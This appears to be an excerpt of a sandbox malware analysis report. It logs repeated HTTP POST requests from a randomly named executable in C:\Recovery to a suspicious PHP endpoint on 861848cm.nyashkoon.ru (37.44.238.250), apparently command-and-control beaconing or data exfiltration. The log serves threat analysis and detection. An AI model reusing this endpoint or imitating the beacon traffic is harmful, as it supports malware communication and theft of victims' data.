                                                                    Nov 6, 2024 03:38:31.077939034 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:31.884031057 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:31.959028006 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    80 | 192.168.2.4 | 49977 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:32.079571962 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:32.884814978 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:32.965516090 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    81 | 192.168.2.4 | 49984 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:33.583528996 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:34.392713070 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:34.468540907 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    82 | 192.168.2.4 | 49985 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:33.589720964 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:34.411118031 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    83 | 192.168.2.4 | 49991 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:34.601540089 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:35.410927057 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:35.487087011 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    84192.168.2.44999937.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:35.615499973 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:36.544732094 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:36.545187950 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP
                                                                    Nov 6, 2024 03:38:36.545218945 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    85 | 192.168.2.4 | 50003 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:36.751256943 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:37.566184044 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:37.640352964 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    86 | 192.168.2.4 | 50009 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:37.873390913 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:38.675180912 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:38.750847101 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    87 | 192.168.2.4 | 50019 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:39.267858028 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    88 | 192.168.2.4 | 50021 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:39.491946936 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1252
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:40.302485943 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:40.374916077 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    89 | 192.168.2.4 | 50022 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:39.609935045 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:40.419034958 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:40.495553017 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    90 | 192.168.2.4 | 50028 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:40.625998974 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:41.439735889 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:41.516890049 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    91 | 192.168.2.4 | 50034 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:41.918498993 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:42.731484890 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:42.808444023 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    92 | 192.168.2.4 | 50040 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:42.940005064 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:43.761729956 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:43.839093924 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    93 | 192.168.2.4 | 50046 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:43.970978975 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:44.901628017 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:44.901806116 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP
                                                                    Nov 6, 2024 03:38:44.901815891 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    94 | 192.168.2.4 | 50052 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:45.035986900 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    95 | 192.168.2.4 | 50056 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:45.382077932 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:46.184535980 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:46.259742022 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    96 | 192.168.2.4 | 50057 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:45.524365902 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:45.876008987 CET | 1012 | OUT | request body
                                                                    Nov 6, 2024 03:38:46.343054056 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:46.413202047 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    97 | 192.168.2.4 | 50063 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:46.540278912 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:46.891597986 CET | 1012 | OUT | request body
                                                                    Nov 6, 2024 03:38:47.349859953 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:47.430001974 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    98 | 192.168.2.4 | 50069 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:47.676194906 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:48.032183886 CET | 1012 | OUT | request body
                                                                    Nov 6, 2024 03:38:48.496067047 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:48.568576097 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    99 | 192.168.2.4 | 50076 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:48.688729048 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:49.047785044 CET | 1012 | OUT | request body
                                                                    Nov 6, 2024 03:38:49.488985062 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:49.568878889 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    100 | 192.168.2.4 | 50082 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:50.337078094 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:50.688301086 CET | 1012 | OUT | request body
                                                                    Nov 6, 2024 03:38:51.148439884 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:51.222868919 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    101 | 192.168.2.4 | 50089 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:51.272571087 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    102 | 192.168.2.4 | 50094 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:51.362425089 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:51.719592094 CET | 1012 | OUT | request body
                                                                    Nov 6, 2024 03:38:52.165292025 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:52.236735106 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    103 | 192.168.2.4 | 50100 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:52.364758968 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:52.719836950 CET | 1012 | OUT | request body
                                                                    Nov 6, 2024 03:38:53.185082912 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:53.264235973 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    104 | 192.168.2.4 | 50104 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:53.401988029 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:53.760251999 CET | 1012 | OUT | request body
                                                                    Nov 6, 2024 03:38:54.212373972 CET | 25 | IN | HTTP/1.1 100 Continue
